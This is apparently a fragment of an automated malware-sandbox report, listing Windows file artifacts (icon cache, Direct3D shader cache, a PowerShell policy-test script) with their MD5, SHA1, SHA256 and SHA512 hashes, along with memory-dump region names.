SHA512 acc6bff3eca0c42f7fe410df3744a6d714ab2263aead18a1bed6e7a29772891bd190888b576e0044f7eebdff8a22903d821c486733792efd94e1d16d3380296d

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

MD5 00b3ce0e658cf92f7ea6ed8e36f76966
SHA1 7109d316553b321577fe6090df84d7182aafa590
SHA256 76b1b9ebbd2b4b90dd4447c698ee7c76ef2a75399a0f33ccb79b1389f679378a
SHA512 eb7998a902bd25847219db3f1800efa94235ee2d62077468993160346255fcfa8acc1b2918aae01cf052c02b9e385b3ec3faf61a425d5924c6709586f87be893

memory/4808-7-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp

memory/4808-6-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp

memory/4808-5-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp

memory/4808-12-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp

memory/4808-17-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp

memory/4808-16-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp

memory/4808-15-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp

memory/4808-14-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp

memory/4808-13-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp

memory/4808-11-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp

C:\Users\Admin\AppData\Local\D3DSCache\ecbf0d5a3a180bb\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

MD5 4f55be8451c1090c2a54a50d79243cfb
SHA1 f1a94bc446b6ae32300ada858fb251667a17b71d
SHA256 1b8257869915ac04445cb4bfdc0e0fc03db80efb96da98c49e7cbc4097bc28a2
SHA512 b87403fc4ab05cd4dd092d0707cd0dd22f927c65dcf73bce6f6bf2731f0572e089697908eeb377617c9f2531fdb3a495087feafb31871ea9a6f472a45d9d20f6

C:\Users\Admin\AppData\Local\D3DSCache\ecbf0d5a3a180bb\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

MD5 c27c1374edd5b819ac9f67c91d286373
SHA1 6768048f19f4dd2a3ab401e9f0b57570601f24a8
SHA256 a2d78e1e44733d24842f4e3a4fb86abd35219df6f6e90393c59abe99e1bb9ec0
SHA512 82bda0747e2e965f9e7a24ae494342af3f96043609eee38db74d18a3da0ddb0c2dabbb23c3f9223e5d0e89256b0b7a4ae0a0537966dd57a181a4505ad8a462c3

C:\Users\Admin\AppData\Local\D3DSCache\ecbf0d5a3a180bb\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

MD5 f49655f856acb8884cc0ace29216f511
SHA1 cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA256 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g3tita52.edg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/112-36-0x0000014AB3AA0000-0x0000014AB3AC2000-memory.dmp